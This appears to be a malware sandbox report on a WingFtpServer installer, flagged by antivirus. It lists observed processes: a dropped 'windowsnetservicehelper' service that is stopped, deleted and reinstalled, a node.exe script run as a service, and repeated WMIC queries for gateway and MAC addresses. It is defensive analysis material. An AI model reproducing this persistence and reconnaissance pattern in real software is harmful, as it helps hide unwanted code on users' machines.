                                                                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                                                                                                                                Imagebase:0x7ff603c50000
                                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                Start time:10:17:57
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                                                                                                                                                Imagebase:0x7ff603c50000
                                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                Start time:10:18:01
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                Imagebase:0x7ff7a4ea0000
                                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                Start time:10:18:06
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-702K3.tmp\WingFtpServer.tmp" /SL5="$403E6,13223801,146432,C:\Users\user\AppData\Local\Temp\WingFtpServer.exe"
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:8279040 bytes
                                                                                                                                                                                                MD5 hash:4137CF8E14B42B0E1C90AF7628E02978
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:Borland Delphi
                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                Start time:10:18:16
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\wns22DB.tmp
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:windowsnetservicehelpersetup.exe /S
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:7109767 bytes
                                                                                                                                                                                                MD5 hash:2BEB8722EA464A6FFB7AE6DC1FE00EF7
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                Start time:10:18:17
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"net" stop windowsnetservicehelper.exe
                                                                                                                                                                                                Imagebase:0xab0000
                                                                                                                                                                                                File size:46592 bytes
                                                                                                                                                                                                MD5 hash:DD0561156F62BC1958CE0E370B23711B
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                Start time:10:18:18
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                Start time:10:18:18
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\system32\net1 stop windowsnetservicehelper.exe
                                                                                                                                                                                                Imagebase:0x1050000
                                                                                                                                                                                                File size:141312 bytes
                                                                                                                                                                                                MD5 hash:B5A26C2BF17222E86B91D26F1247AF3E
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                Start time:10:18:20
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"taskkill" /IM windowsnetservicehelper.exe /T /F
                                                                                                                                                                                                Imagebase:0xa40000
                                                                                                                                                                                                File size:74752 bytes
                                                                                                                                                                                                MD5 hash:15E2E0ACD891510C6268CB8899F2A1A1
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                Start time:10:18:21
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                Start time:10:18:24
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"sc" delete windowsnetservicehelper.exe
                                                                                                                                                                                                Imagebase:0xde0000
                                                                                                                                                                                                File size:60928 bytes
                                                                                                                                                                                                MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                Start time:10:18:24
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                Start time:10:18:32
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"windowsnetservicehelper.exe" install
                                                                                                                                                                                                Imagebase:0x11f0000
                                                                                                                                                                                                File size:121344 bytes
                                                                                                                                                                                                MD5 hash:C48855FE677EB4D5C999C01ECCFDB0BC
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                Start time:10:18:35
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                Start time:10:18:36
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"windowsnetservicehelper.exe" start
                                                                                                                                                                                                Imagebase:0x11f0000
                                                                                                                                                                                                File size:121344 bytes
                                                                                                                                                                                                MD5 hash:C48855FE677EB4D5C999C01ECCFDB0BC
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                Start time:10:18:37
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                Start time:10:18:37
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Program Files (x86)\WindowsNetService\windowsnetservicehelper.exe
                                                                                                                                                                                                Imagebase:0x11f0000
                                                                                                                                                                                                File size:121344 bytes
                                                                                                                                                                                                MD5 hash:C48855FE677EB4D5C999C01ECCFDB0BC
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                Start time:10:18:38
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Program Files (x86)\WindowsNetService\node.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Program Files (x86)\WindowsNetService\node.exe" "C:\Program Files (x86)\WindowsNetService\service.js
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:6887560 bytes
                                                                                                                                                                                                MD5 hash:5F40521D2E1082FE1C734610C4A83911
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                Start time:10:18:44
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                Start time:10:18:49
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                Imagebase:0x9b0000
                                                                                                                                                                                                File size:391680 bytes
                                                                                                                                                                                                MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                Start time:10:18:54
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                Start time:10:18:57
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                Imagebase:0x7ff603c50000
                                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                Start time:10:18:58
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
                                                                                                                                                                                                Imagebase:0x9b0000
                                                                                                                                                                                                File size:391680 bytes
                                                                                                                                                                                                MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:40
                                                                                                                                                                                                Start time:10:18:58
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                                                                                                                                Imagebase:0x7ff69e5c0000
                                                                                                                                                                                                File size:455656 bytes
                                                                                                                                                                                                MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                Start time:10:18:59
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:42
                                                                                                                                                                                                Start time:10:18:59
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:43
                                                                                                                                                                                                Start time:10:19:06
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                Imagebase:0x9b0000
                                                                                                                                                                                                File size:391680 bytes
                                                                                                                                                                                                MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:44
                                                                                                                                                                                                Start time:10:19:07
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:45
                                                                                                                                                                                                Start time:10:19:14
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
                                                                                                                                                                                                Imagebase:0x9b0000
                                                                                                                                                                                                File size:391680 bytes
                                                                                                                                                                                                MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:46
                                                                                                                                                                                                Start time:10:19:15
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:47
                                                                                                                                                                                                Start time:10:19:16
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\BackgroundTransferHost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                                                                Imagebase:0x7ff620b20000
                                                                                                                                                                                                File size:36864 bytes
                                                                                                                                                                                                MD5 hash:02BA81746B929ECC9DB6665589B68335
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:49
                                                                                                                                                                                                Start time:10:19:23
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                                Imagebase:0x7ff603c50000
                                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:50
                                                                                                                                                                                                Start time:10:19:23
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                Imagebase:0x9b0000
                                                                                                                                                                                                File size:391680 bytes
                                                                                                                                                                                                MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:52
                                                                                                                                                                                                Start time:10:19:24
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:53
                                                                                                                                                                                                Start time:10:19:36
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
                                                                                                                                                                                                Imagebase:0x9b0000
                                                                                                                                                                                                File size:391680 bytes
                                                                                                                                                                                                MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:54
                                                                                                                                                                                                Start time:10:19:37
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:wmic path Win32_NetworkAdapterConfiguration where IPEnabled=true get DefaultIPGateway,GatewayCostMetric,IPConnectionMetric,Index /format:table
                                                                                                                                                                                                Imagebase:0x9b0000
                                                                                                                                                                                                File size:391680 bytes
                                                                                                                                                                                                MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:55
                                                                                                                                                                                                Start time:10:19:37
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:56
                                                                                                                                                                                                Start time:10:19:37
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:57
                                                                                                                                                                                                Start time:10:19:43
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:wmic path Win32_NetworkAdapter where Index=1 get NetConnectionID,MACAddress /format:table
                                                                                                                                                                                                Imagebase:0x9b0000
                                                                                                                                                                                                File size:391680 bytes
                                                                                                                                                                                                MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                General

                                                                                                                                                                                                Target ID:58
                                                                                                                                                                                                Start time:10:19:43
                                                                                                                                                                                                Start date:12/09/2022
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6da640000
                                                                                                                                                                                                File size:625664 bytes
                                                                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language

                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:16.4%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:61
                                                                                                                                                                                                  Total number of Limit Nodes:2
